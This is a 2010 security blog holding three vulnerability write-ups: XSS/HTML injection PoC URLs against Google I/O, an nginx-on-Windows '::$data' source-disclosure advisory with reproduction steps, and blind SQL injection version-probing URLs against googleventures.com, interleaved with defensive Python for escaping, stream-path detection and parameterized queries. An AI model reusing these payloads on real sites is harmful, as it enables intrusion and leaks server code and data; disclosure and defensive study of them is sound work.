Wednesday, June 23, 2010

:::SPAS3C-WV-003:::Google IO XSS/HTML Injection Vulnerability



This post is about a bug discovered in Google IO (XSS/HTML Injection).

Risk: Medium

"Google I/O brings together thousands of developers for two days of deep technical content, focused on building the next generation of web, mobile, and enterprise applications with Google and open web technologies such as Android, Google Chrome, Google APIs, Google Web Toolkit, App Engine, and more."

Source: here

The GET variable "error" was vulnerable to XSS/HTML code injection, but some tags and JavaScript events were filtered to make exploitation more difficult.
I also noticed, while viewing the source code, that the error variable triggered a SQL error, so I tried a SQL injection, but it didn't work.

Proof of concept:

Indirect. User interaction needed (JavaScript event: onmouseout) -> https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin&error=36%22%3E%3Ca%20href=%22http://www.malware.es%22%20onmouseout=%22alert%281%29%22%3EHOLA%20GOOGLE%3C/a%3E


Fig.1: XSS (Indirect) and HTML Injection.

Direct. No user interaction needed (JavaScript event: onerror) -> https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin&error=36%22%3E%3Ch1%3E%3Cimg%20src=%22pepe.jpg%22%20onerror=%22alert%281%29%22%3EHI%20GOOGLE%20SECURITY%20TEAM%20I%27M%20%20ONLY%20TESTING%3C/a%3E%3C/h1%3E


Fig.2: XSS (Direct) and HTML Injection.
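The fix for this class of bug is contextual output encoding rather than filtering tags and events. The following is an added example (not code from the post or from the Google I/O site) that pulls the `error` value out of the two PoC URLs above, renders it into a constructed hidden-input template the way the vulnerable page presumably did, and shows that HTML attribute escaping neutralizes both payloads; the template and the `attribute_breakout` heuristic are assumptions made for the illustration.

```python
# Added example (not from the original post): contextual output encoding for a
# reflected query parameter such as the "error" value.  The two URLs are the PoC
# links from the post; the hidden-input template is a constructed stand-in for
# the page that echoed "error" into an HTML attribute.
import html
from urllib.parse import parse_qs, urlsplit

POC_INDIRECT = (
    "https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin"
    "&error=36%22%3E%3Ca%20href=%22http://www.malware.es%22%20onmouseout="
    "%22alert%281%29%22%3EHOLA%20GOOGLE%3C/a%3E"
)
POC_DIRECT = (
    "https://www.google-io.com/2010/index.cfm?fuseaction=reg.ReturnLogin"
    "&error=36%22%3E%3Ch1%3E%3Cimg%20src=%22pepe.jpg%22%20onerror=%22alert%281%29"
    "%22%3EHI%20GOOGLE%20SECURITY%20TEAM%20I%27M%20%20ONLY%20TESTING%3C/a%3E%3C/h1%3E"
)


def error_param(url: str) -> str:
    """Return the percent-decoded 'error' query value ('' if absent).

    parse_qs splits each pair on the first '=' only, so the '=' characters
    inside the payload stay part of the value.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("error", [""])[0]


def render_unsafe(error: str) -> str:
    """The failure mode: the raw value is interpolated into an attribute."""
    return f'<input type="hidden" name="error" value="{error}">'


def render_safe(error: str) -> str:
    """Attribute-context encoding: &, <, >, " and ' are all replaced by entities,
    so the value cannot close the attribute or open a new tag."""
    return f'<input type="hidden" name="error" value="{html.escape(error, quote=True)}">'


def attribute_breakout(rendered: str) -> bool:
    """Constructed check: the template contains exactly one tag, so any further
    '<' in the rendered markup means the value escaped its attribute."""
    return rendered.count("<") > 1


if __name__ == "__main__":
    for url in (POC_INDIRECT, POC_DIRECT):
        value = error_param(url)
        print("unsafe breakout:", attribute_breakout(render_unsafe(value)))
        print("safe   breakout:", attribute_breakout(render_safe(value)))
```

The filtered-tag approach the post describes fails because the attacker only needs one tag or event the blocklist missed; escaping every significant character for the context the value lands in removes the question entirely.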

Be safe ;)

Friday, June 11, 2010

:::SPAS3C-SV-001:::NGINX [ENGINE X] SERVER <= 0.7.65 /0.8.39 SOURCE CODE DISCLOSURE/DOWNLOAD VULN. (CVE-2010-2263)

I found this vulnerability one week ago, but I was waiting for a fucking CVE number when somebody published a similar advisory without checking. This researcher made a public disclosure on an old release and he also said that it isn't fixed, which is false (at least the Source Code Disclosure/Download got fixed with the latest releases).

Copied from the ChangeLog for 0.8.40/0.7.66 (final releases in the stable/development channels):

-------------------------START-COPY-------------------------------

Changes with nginx 0.8.40 07 Jun 2010

*) Security: now nginx/Windows ignores default file stream name.
Thanks to Jose Antonio Vazquez Gonzalez.

*) Feature: the ngx_http_uwsgi_module.
Thanks to Roberto De Ioris.

*) Feature: a "fastcgi_param" directive with value starting with
"HTTP_" overrides a client request header line.

*) Bugfix: the "If-Modified-Since", "If-Range", etc. client request
header lines were passed to FastCGI-server while caching.

*) Bugfix: listen unix domain socket could not be changed during
reconfiguration.
Thanks to Maxim Dounin.

-------------------------END-COPY-------------------------------

But the vulnerability databases don't seem to have confirmed anything.

This is my advisory:

-------------------------START-ADVISORY-------------------------------

TITLE: NGINX [ENGINE X] SERVER <= 0.7.65 (STABLE)/0.8.39 (DEVELOPMENT) SOURCE CODE DISCLOSURE/DOWNLOAD VULNERABILITY
TESTED OS: WINDOWS XP SP3 / WINDOWS 7 HOME PREMIUM
SEVERITY: HIGH
CVE-NUMBER: CVE-2010-2263
IMPACT: READ/DOWNLOAD SOURCE CODE OF WEB APP FILES
DISCOVERED DATE: 2010-06-04
FIXED DATE: 2010-06-07
FIXED VERSIONS: NGINX/0.8.40 AND NGINX/0.7.66
DISCOVERED BY: JOSE ANTONIO VAZQUEZ GONZALEZ

======ABOUT APPLICATION======

"nginx [engine x] is a HTTP and reverse proxy server, as well as a mail proxy server written by Igor Sysoev. It has been running for more than five years on many heavily loaded Russian sites including Rambler (RamblerMedia.com). According to Netcraft nginx served or proxied 4.70% busiest sites in April 2010. Here are some of success stories: FastMail.FM, Wordpress.com. The sources are licensed under 2-clause BSD-like license." copied from -> http://nginx.org/en/ [ref-1]

======TESTED VERSIONS=====

Unix versions are not vulnerable (it only affects the NTFS file system).

Windows Stable versions:

nginx/0.7.66 --> Not vulnerable
nginx/0.7.65 --> Vulnerable
nginx/0.7.64 --> Vulnerable
nginx/0.7.63 --> Vulnerable
nginx/0.7.62 --> Vulnerable
nginx/0.7.61 --> Vulnerable
nginx/0.7.60 --> Vulnerable
nginx/0.7.59 --> Vulnerable
nginx/0.7.58 --> Vulnerable
nginx/0.7.56 --> Vulnerable

Windows Development versions:

nginx/0.8.40 --> Not vulnerable
nginx/0.8.39 --> Vulnerable
nginx/0.8.38 --> Vulnerable
nginx/0.8.37 --> Vulnerable
nginx/0.8.36 --> Vulnerable
nginx/0.8.35 --> Vulnerable
nginx/0.8.34 --> Vulnerable
nginx/0.8.33 --> Vulnerable
nginx/0.8.32 --> Vulnerable
nginx/0.8.31 --> Vulnerable
nginx/0.8.30 --> Vulnerable

======DESCRIPTION======

This application was vulnerable to a source code disclosure/download vulnerability when running on Windows (NTFS file system).
The request parser couldn't handle ADS (Alternate Data Streams) and treated a data stream as a regular file. An attacker could read/download the source code of web application files by requesting the default (unnamed) data stream: "filename::$data".

This issue is similar to an old security issue in Microsoft Windows IIS [ref-2].

======PROOF OF CONCEPT======

http://[IP]/[FILE]::$data

======STEPS TO REPRODUCE======

1.- Start the server.

2.- Go to http://127.0.0.1/index.html::$data

3.- The browser prompts to download the file... yes... open the downloaded file.
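On the defender's side, the request above is easy to recognize once the path is percent-decoded: NTFS addresses streams as `file:stream[:type]`, and the default stream of a file is `file::$DATA` (the form in the PoC). The following is an added example, not nginx code and not from the advisory, that parses that syntax out of a request target, and runs the check over a few constructed nginx access-log lines; it generalizes from the `::$data` case to any named stream, and the log lines, IPs and paths are constructed for the illustration.

```python
# Added example (not nginx code, not from the advisory): recognising NTFS
# alternate data stream syntax in request paths, and scanning constructed
# nginx access-log lines for it.
import re
from urllib.parse import unquote

# nginx "combined" log format: client, ident, user, [time], "request", status, bytes, ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not real traffic): two normal requests and two
# requests for the default data stream, one of them percent-encoded.
SAMPLE_LOG = """\
127.0.0.1 - - [04/Jun/2010:10:00:01 +0200] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
127.0.0.1 - - [04/Jun/2010:10:00:05 +0200] "GET /index.html::$data HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.7 - - [04/Jun/2010:10:01:12 +0200] "GET /app/config.php%3A%3A%24DATA HTTP/1.1" 200 1834 "-" "curl/7.19"
10.0.0.7 - - [04/Jun/2010:10:01:30 +0200] "GET /images/logo.png HTTP/1.1" 200 4096 "-" "curl/7.19"
"""


def parse_stream_ref(target: str):
    """Return (file, stream, type) if the last path segment uses NTFS stream
    syntax 'file:stream[:type]', else None.

    The target is percent-decoded first and the query string dropped, so an
    encoded colon is treated the same as a literal one.  An empty stream name
    with type $DATA is the file's default (unnamed) stream, i.e. 'file::$DATA'.
    """
    decoded = unquote(target).split("?", 1)[0]
    segment = re.split(r"[/\\]", decoded)[-1]
    if ":" not in segment:
        return None
    parts = segment.split(":", 2)
    stream_type = parts[2] if len(parts) == 3 else "$DATA"  # $DATA is NTFS's default stream type
    return parts[0], parts[1], stream_type.upper()


def has_ntfs_stream(target: str) -> bool:
    """True if the request target should be refused on an NTFS-backed server."""
    return parse_stream_ref(target) is not None


def scan_access_log(text: str):
    """Yield (client ip, status, decoded target, stream ref) for every stream request.
    A 200 status on such a line means the stream, i.e. the raw file, was served."""
    hits = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        ref = parse_stream_ref(m["target"])
        if ref is not None:
            hits.append((m["ip"], m["status"], unquote(m["target"]), ref))
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Because the check works on the decoded last path segment, it also flags named streams (`index.html:hidden`) and explicit types, not just the `::$data` form shown in the advisory; on a server that only runs on Unix the check is harmless, since a colon is never a stream separator there.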

======REFERENCES======

[ref-1] -> http://nginx.org/
[ref-2] -> http://www.microsoft.com/technet/security/bulletin/ms98-003.mspx


======DISCLOSURE TIMELINE======

Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)

[2010-06-04] => Initial contact with vendor and advisory sent.
[2010-06-04] => Vendor responds and believes that the vulnerability got fixed with the previous release.
[2010-06-04] => I confirm that nginx is vulnerable on Windows 7.
[2010-06-04] => Vendor will look into the issue.
[2010-06-04] => Vendor confirms the issue and says it will be fixed on Monday.
[2010-06-07] => New releases out.
[2010-06-07] => I sent the complete advisory and proposed Wednesday as the disclosure date.
[2010-06-10] => Second request to confirm public disclosure.
[2010-06-10] => Vendor agrees.
[2010-06-11] => Forced to public disclosure.

======CREDITS=======

Jose Antonio Vazquez Gonzalez,
Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/

Thanks to Ruben Santamarta (@reversemode) and Jose Maria Alonso (@maligno) for their support in other issues.

-------------------------END-ADVISORY-------------------------------

This is a visual Proof Of Concept (video):

Watch on YouTube -> http://www.youtube.com/watch?v=DvQtvV8kQhY

Being good (responsible disclosure) has disadvantages... bye bye my first software advisory :(

Update: Thanks to Exploit-DB and SecurityFocus because they (will) have updated their databases and (will) have published my advisory.

Be safe ;)

Wednesday, June 9, 2010

:::SPAS3C-WV-002:::Google App (Ventures) BSQLi Vulnerability



One month ago, I found several vulnerabilities in Google's sites.

These issues all got fixed, and I want to say that the Google Security Team did a good job and fixed them quickly.

All issues were discovered between 4 May and 9 May (2010, of course).

This issue is the most important in my opinion: Blind SQL Injection in googleventures.com.

Risk: High

Google Ventures is Google’s venture capital arm.

We do primarily three things:
  1. Seek out the most innovative and interesting entrepreneurs and companies we can find
  2. Perform in-depth due diligence and invest in those we are most excited about
  3. Do everything we can to help those companies succeed
We invest for financial return, across all sectors and in all stages of a company’s growth. We are particularly interested in areas where access to our team, facilities, technology or other resources can help a company become more successful, but we do not limit our investments to those of strategic interest to Google – we look for companies and people that have the best opportunity to create significant, disruptive and innovative ventures.

Source: here

The site was built using PHP+MySQL (some parts) and the GET variable "jobid" was vulnerable to SQL code injection.

Proofs of Concept (finding the MySQL version)

Returns 1=1 (true), so the MySQL version is 5.

Link PoC -> http://jobs.googleventures.com/jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=5,1,0)=1--


Fig. 1: BSQLi. True result.

Returns 1=0 (false), so the MySQL version isn't 4.

Link PoC -> http://jobs.googleventures.com/jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=4,1,0)=1--


Fig. 2: BSQLi. False result.

I also tried a SQL injection with a "UNION SELECT" statement, but it didn't work.


Fig. 3: Trying SQL Injection "Union Select". MySQL error.

I didn't want to do further research because I considered that it was enough.
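The root cause of a blind injection like this is that the `jobid` value is spliced into the SQL text, so the comparison the attacker appends becomes part of the WHERE clause. The following is an added example, not code from the post or from googleventures.com, showing the vulnerable query shape beside the fixed one: an integer whitelist on the parameter plus parameter binding. SQLite stands in for MySQL, and the table, the sample row and the function names are constructed for the illustration; the payload string is the decoded `jobid` value from the first PoC link above.

```python
# Added example (not from the post, not the site's code): the fix for a
# "jobid"-style parameter.  sqlite3 stands in for MySQL; the schema, the
# sample row and the query shape are constructed for illustration.
import sqlite3

# The post's first PoC value, decoded ('+' -> space).
PAYLOAD = "39109 AND IF(substring(@@version,1,1)=5,1,0)=1--"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table with one job row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jobs (jobid INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO jobs VALUES (39109, 'Constructed sample job')")
    return conn


def build_query_unsafe(raw_jobid: str) -> str:
    """The failure mode: string concatenation.  The returned text shows the
    attacker's expression sitting inside the WHERE clause.  Never executed here."""
    return f"SELECT title FROM jobs WHERE jobid = {raw_jobid}"


def is_valid_jobid(raw: str) -> bool:
    """Whitelist validation: a job id is a non-empty string of ASCII digits, nothing else."""
    return raw.isascii() and raw.isdigit()


def fetch_job_bound_only(conn: sqlite3.Connection, raw_jobid: str):
    """Parameter binding alone: the whole value is a literal, never SQL, so the
    payload simply matches no row instead of steering the query."""
    row = conn.execute("SELECT title FROM jobs WHERE jobid = ?", (raw_jobid,)).fetchone()
    return row[0] if row else None


def fetch_job(conn: sqlite3.Connection, raw_jobid: str):
    """Defence in depth: reject anything that is not an integer, then bind."""
    if not is_valid_jobid(raw_jobid):
        raise ValueError(f"invalid jobid: {raw_jobid!r}")
    row = conn.execute("SELECT title FROM jobs WHERE jobid = ?", (int(raw_jobid),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(build_query_unsafe(PAYLOAD))
    conn = make_db()
    print(fetch_job(conn, "39109"))
    print(fetch_job_bound_only(conn, PAYLOAD))
```

Validation on its own is not enough where the parameter is legitimately free text, which is why binding is the primary control and the integer check is the second layer; the inverse (binding without validation) still returns a sane "not found" for the payload, as `fetch_job_bound_only` shows.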

Be safe ;)